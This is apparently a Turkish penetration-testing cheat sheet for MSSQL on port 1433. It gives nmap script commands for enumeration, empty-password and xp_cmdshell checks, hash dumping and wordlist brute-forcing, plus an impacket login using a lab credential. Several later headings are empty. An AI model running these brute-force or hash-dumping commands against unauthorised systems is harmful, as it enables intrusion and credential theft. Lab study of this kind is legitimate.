MSSQL - 1433
Tarama
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 192.168.1.3Bağlantı
# GUI
navicat
# Manuel
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-authBasit Bilgiler
MSSQL sunucusu üzerinde genel bilgileri almak için kullanılır.
nmap --script ms-sql-info -p 1433 192.168.1.3MSSQL sunucusu hakkında NTLM bilgilerini elde etmek için kullanılır.
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 192.168.1.3Brute Force
MSSQL sunucusuna şifre kırma saldırısı yapmak için kullanılır. Belirtilen kullanıcı adı ve şifre listelerini kullanarak deneme yapar.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 192.168.1.3MSSQL sunucusunda boş şifreleri kontrol etmek için kullanılır.
Komut Çalıştırma
Create File
Read File
NTLM Dump
Imporsanate
Last updated